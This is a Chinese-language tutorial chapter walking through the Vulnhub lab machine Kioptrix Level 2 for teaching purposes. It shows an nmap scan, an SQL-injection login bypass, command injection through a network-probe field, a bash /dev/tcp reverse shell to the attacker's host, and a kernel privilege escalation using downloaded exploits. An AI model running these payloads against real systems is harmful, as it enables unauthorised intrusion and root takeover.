第三节内容讲述了Web命令注入漏洞和原理,并在DVWA上体验了一把入侵。本节以实战的方式,结合vulnhub靶机Kioptrix Level 2让大家体会命令注入的真实入侵。这个靶机会涉及到一点SQL注入的知识,但易于理解。后续章节会给大家着重讲解SQL注入。
如果靶机部署有疑问,请留言!
1.信息收集
kali IP为192.168.17.4
发现靶机IP 192.168.17.5
使用第二章nmap命令扫描靶机,
nmap -p `nmap -p- --min-rate=10000 -T4 192.168.17.5 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//` -sC -sV 192.168.17.5
扫描结果如下,
Starting Nmap 7.80 ( https://nmap.org ) at 2021-08-16 10:00 EDT
Nmap scan report for 192.168.17.5
Host is up (0.0011s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
443/tcp open ssl/https?
|_ssl-date: 2021-08-16T18:01:50+00:00; +3h59m59s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC4_64_WITH_MD5
|_ SSL2_DES_64_CBC_WITH_MD5
616/tcp open status 1 (RPC #100024)
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 08:00:27:FA:1F:9D (Oracle VirtualBox virtual NIC)
Host script results:
|_clock-skew: 3h59m58s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.98 seconds
打开网页,是一个登陆框,
使用sql注入的万能密码尝试登陆,
登陆成功,是一个网络探测功能的页面,
使用以下命令,尝试命令注入,
192.168.17.4; id
存在命令执行漏洞。
2.获取低权限shell
从第一章里选择一个反向连接,
bash -i >& /dev/tcp/192.168.17.4/4444 0>&1
kali监听4444端口,在漏洞界面输入
192.168.17.4;bash -i >& /dev/tcp/192.168.17.4/4444 0>&1
成功获取了一个低权限shell。
3.权限提升
从本章开始,靶机引入提权的方法。后续会有一个章节对提权进行总结。
进入系统后先查看系统版本,uname -a
内核版本为2.6.9。部署靶机时我们指导系统为centos。本地使用searchsploit进行漏洞搜索,
9542貌似可用,拷贝到当前目录searchsploit -m。
开启一个http服务用于传输文件到靶机。靶机切换到/tmp目录wget下载PoC,
gcc进行编译执行,
失败!!!!!!!!!!!!!!!!
尝试9545
下载到靶机
编译执行,
成功!!!!!!
4.总结
首先通过sql注入万能密码进入系统,里面是一个带有命令注入漏洞的界面,利用可获得低权限shell。提权是内核提权。
本节靶机练习,让我们了解了sql注入的渗透用法,熟悉了名利注入漏洞的利用,了解了靶机与攻击主机的文件传递,体验内核提权。